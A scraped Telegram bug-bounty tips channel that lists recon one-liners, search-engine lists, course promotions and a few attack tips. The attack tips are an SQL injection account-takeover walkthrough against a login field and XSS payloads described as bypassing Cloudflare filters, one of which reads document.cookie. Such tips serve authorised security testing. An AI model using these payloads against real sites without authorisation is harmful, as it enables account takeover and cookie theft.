Bug Bounty
Open in Telegram
Bugbounty Resources • Tips • Security Zines • Writeups • Vulnerability Update • Notes • Mindmaps • Cheatsheets • Checklists • Article / Blogs • PDFs • ebooks •
Show more9 446
Subscribers
No data24 hours
-37 days
-6030 days
Posts Archive
9 446
+1
🚨 XSS Hunting from WaybackURLS 🔍
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss
credit : gudetama_bf
#bugbountytips #bugbounty
9 446
🚨Subdominator - Unleash the Power of Subdomain Enumeration🚨
📢Subdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.
🔗Link- https://github.com/RevoltSecurities/Subdominator
9 446
Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#BugBounty #bugbountytips9 446
🔍 Search Engines for Bug hunter & Security Pro : [ Recon is the key ]
1. http://google.com - Dorks
2. http://shodan.io - Servers
3. http://censys.io - Servers
4. http://hunter.io - Mail addresses
5. http://fullhunt.io - Attack Surface
6. http://onyphe.io - Servers
7. http://socradar.io - Threat Intelligence
8. http://binaryedge.io - Attack Surface
9. http://intelx.io - OSINT
10. http://crt.sh - Certificate search
11. http://vulners.com - Vulnerabilities
12. http://securitytrails.com - Servers
#CyberSecurity #InfoSec
9 446
SQL Injection to Account Takeover Manually :)
1. Enter mobile number to login intercept
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200
2. Final Query:
8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --
2024-04-03 21:20:55 >> Exact time and date
1 >> attempts
you can see the 200 response
last you can login with the 1110 OTP and get access to the victim account :)
Credit- Kullai
9 446
Hackerone got hacked! How can I steal your POC? 🥷🏻
• Weakness - Sensitive Information Disclosure
• Bounty - $15,000
• CC - Hasyim
Critical bugs directly upstream (Hackerone) as a bug bounty platform :
https://kresec.medium.com/hackerone-got-hacked-how-can-i-steal-your-poc-01a9132c5aeb
9 446
💾 File Upload Vulnerability 💻
Learn how to secure your website against file upload vulnerabilities, a common target for attackers seeking to compromise your system.
🔒 Check out our latest blog post for tips on securing file uploads:
https://vulncure.com/blog/tips-to-secure-file-upload/
9 446
(Hard filter+Cloudflare bypassed) Stored XSS leads account takeover
Payload: xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>
Tips: Always play with input's => reflecting value's tags. even there is waf/cloudflare.
#bugbountytip #bugbounty
9 446
Unlock a 20% discount on our Pentest Pro course! Hurry, offer ends April 25th. Use code: CGT-20-OFF.
9 446
Hey everyone! 👋
Exciting news: tonight at 9:00 PM, we're hosting a voice chat on our Telegram channel with Neeraj Chandra, CEO of HackLearners. He'll be talking about how to grow your career in cybersecurity. It's a great chance to learn from the best in the field. Don't miss out!
9 446
New XSS Bypass Cloudflare WAF 🧱
Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
9 446
🌟 Exciting Opportunity Alert! 🌟
We're excited to announce that three students will have the chance to win a free pentesting course! To enter🚪, simply comment why you're eager to learn pentesting and retweet this post. Good luck! 🎉
#hacklearners
https://x.com/_HackLearners/status/1780800923901509786
